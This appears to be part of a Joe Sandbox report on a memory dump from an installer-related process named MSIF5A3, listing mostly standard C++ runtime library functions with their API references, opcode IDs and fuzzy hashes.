                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2372200979-0
                                                                                                                                                                                                                              • Opcode ID: d88ec73113b6e6179e4f0481810ce0ffc1b60de991682162a20c6cf8c16c464f
                                                                                                                                                                                                                              • Instruction ID: 910dabecd86ecb5fd4adb043eaed67daf20b0df73592abef59efcd55edf9631d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d88ec73113b6e6179e4f0481810ce0ffc1b60de991682162a20c6cf8c16c464f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D51BA70D04699DFCB25CF68C444BAEBFF5FB14710F148559E885AB282D774AA01CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E6FB0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 77COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 005E6FB7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: <Sc$<Sc$<Sc$> returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                                                              • API String ID: 1452528299-2426465841
                                                                                                                                                                                                                              • Opcode ID: 3076a840b6880fd441048ed4ff32e8d3b8851b664b882a8f30e918becf19ba8b
                                                                                                                                                                                                                              • Instruction ID: fc440d3683ca89f506f5f9b52a33c17aa78b1e9c90362a39bd6895a2459e368a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3076a840b6880fd441048ed4ff32e8d3b8851b664b882a8f30e918becf19ba8b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C021D449B102A282DB381F399405339BAE1FF58794F64186FD8C9D7380FA698C828394
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ED87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005ED883
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005ED88D
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • numpunct.LIBCPMT ref: 005ED8C7
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005ED8DE
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005ED8FE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 743221004-1377069549
                                                                                                                                                                                                                              • Opcode ID: e09d07b131174968c3c329ac52e96ffdb289ee3c12b26a611f65efa2ae9861ed
                                                                                                                                                                                                                              • Instruction ID: 355231d4dfd5f98f6e8542da1f4114f319076b3f4ea50cdc418b9abd8757231f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e09d07b131174968c3c329ac52e96ffdb289ee3c12b26a611f65efa2ae9861ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6511CE3590066A9BCB18EB6598196BEBB76BF84310F240409F555AB3D2CF349E018BA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F238F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2396
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F23A0
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 005F23DA
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F23F1
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2411
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 712880209-1377069549
                                                                                                                                                                                                                              • Opcode ID: 69521d6be25f8fe5cdade1d4250abf1ea4bab5f34ff7fd0d72ede37bf2b3d683
                                                                                                                                                                                                                              • Instruction ID: b44c4e35211bf7f5afa968238b570e7bbe456a539539015192ddaa2810788c41
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69521d6be25f8fe5cdade1d4250abf1ea4bab5f34ff7fd0d72ede37bf2b3d683
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C501C07590112EDBCB15EB6499496BE7FA6BFC0710F280409E6156B2D2CFB89E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2424 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F242B
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2435
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • collate.LIBCPMT ref: 005F246F
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2486
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F24A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 1007100420-1377069549
                                                                                                                                                                                                                              • Opcode ID: b8a94fa7c3dc9a0f1027f8905610e1158fccd87f4f02e166b1710376027f8580
                                                                                                                                                                                                                              • Instruction ID: 5737625082fed3b24019a4309f8059d00608b7a5bca1af853374c40ac858f9c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a94fa7c3dc9a0f1027f8905610e1158fccd87f4f02e166b1710376027f8580
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E01C07190012ADBCF14EB60E8096BE7F66BF84720F280409E6046B3D2DFB89E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F24B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F24C0
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F24CA
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • collate.LIBCPMT ref: 005F2504
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F251B
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F253B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 1007100420-1377069549
                                                                                                                                                                                                                              • Opcode ID: 62aa8c7a13464b237564dc2205ab0113496b24d6425e7dd4b3e0e14816f43b68
                                                                                                                                                                                                                              • Instruction ID: 36fd6a0c0ebcc9a5a7d1d71896bd43ce37b27443ef9b69c4dce73851e4765f40
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62aa8c7a13464b237564dc2205ab0113496b24d6425e7dd4b3e0e14816f43b68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C801007180012ADBCB08EB64E809ABE7F66BF80720F240408F6046B2D2CF389E018B90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F254E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2555
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F255F
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • ctype.LIBCPMT ref: 005F2599
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F25B0
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F25D0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 83828444-1377069549
                                                                                                                                                                                                                              • Opcode ID: edf3fd30cbd3dfebdc235ad68b70332f00e72a3f3edb76cce5d411841d9cae7d
                                                                                                                                                                                                                              • Instruction ID: e5f52e5a246ae684facd5e965b7beeeb89c67fcba93c76d36a87833628633c43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: edf3fd30cbd3dfebdc235ad68b70332f00e72a3f3edb76cce5d411841d9cae7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401C07190116E9BCB14EBA0D819ABE7F66BF84310F240449F615AB2D2DF389E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F25E3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F25EA
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F25F4
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • messages.LIBCPMT ref: 005F262E
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F2645
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F2665
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2750803064-1377069549
                                                                                                                                                                                                                              • Opcode ID: b15a230c9a60692991979d502063f0f1d2792f328e9f517890052e251338219e
                                                                                                                                                                                                                              • Instruction ID: abae467cec5d81bfa656c7a0cf5323da2ae7210e83553d56f4121fe02bcffe64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b15a230c9a60692991979d502063f0f1d2792f328e9f517890052e251338219e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101C07590012A9BCB15EB60A819ABE7F66BF80310F244409F615AB2D2CF789E01CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2678 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F267F
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2689
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • messages.LIBCPMT ref: 005F26C3
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F26DA
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F26FA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2750803064-1377069549
                                                                                                                                                                                                                              • Opcode ID: c0c0ecf3fbc7fbff026f7269fbc833998790907bf8385ad3d1a44de778822f2c
                                                                                                                                                                                                                              • Instruction ID: 4ea21ec2c025e845383c9343384ee7b5f8beb76de96f66d97324c95aa26953c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0c0ecf3fbc7fbff026f7269fbc833998790907bf8385ad3d1a44de778822f2c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B01C07590152A9FCB15EB64D809ABE7FA6BF84310F240409F614AB3D2DF789E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FE843 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FE84A
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FE854
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • collate.LIBCPMT ref: 005FE88E
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FE8A5
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FE8C5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 1007100420-1377069549
                                                                                                                                                                                                                              • Opcode ID: db8e4131f4426a6e1b44017e69790c93256ab9dacc26c71a293045ed14bfa0db
                                                                                                                                                                                                                              • Instruction ID: 43fc809975acbc90d803403af567e0639672704e8dd1b184d297aecf851f0f32
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db8e4131f4426a6e1b44017e69790c93256ab9dacc26c71a293045ed14bfa0db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A201843590152A9BCB15FB64980A6BE7FA6BFC4710F244409F6156B3D2CF789E018B91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FE8D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005FE8DF
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005FE8E9
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • messages.LIBCPMT ref: 005FE923
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005FE93A
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005FE95A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 2750803064-1377069549
                                                                                                                                                                                                                              • Opcode ID: 9fea38c7a16f984f82d0aef1dca781c9478550774e7216397054f04cb12d6ead
                                                                                                                                                                                                                              • Instruction ID: a2e823741a2f88d1c2ce0ea838165ece4a0e37929c9ca30ce153bb546db72af8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fea38c7a16f984f82d0aef1dca781c9478550774e7216397054f04cb12d6ead
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E701C43190125A9FCB14EB60990A6BE7FA6BF80710F290409E6146B2D2CF789E01C791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F2961 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 005F2968
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F2972
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::_Lockit.LIBCPMT ref: 005E8C50
                                                                                                                                                                                                                                • Part of subcall function 005E8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 005E8C78
                                                                                                                                                                                                                              • moneypunct.LIBCPMT ref: 005F29AC
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 005F29C3
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F29E3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
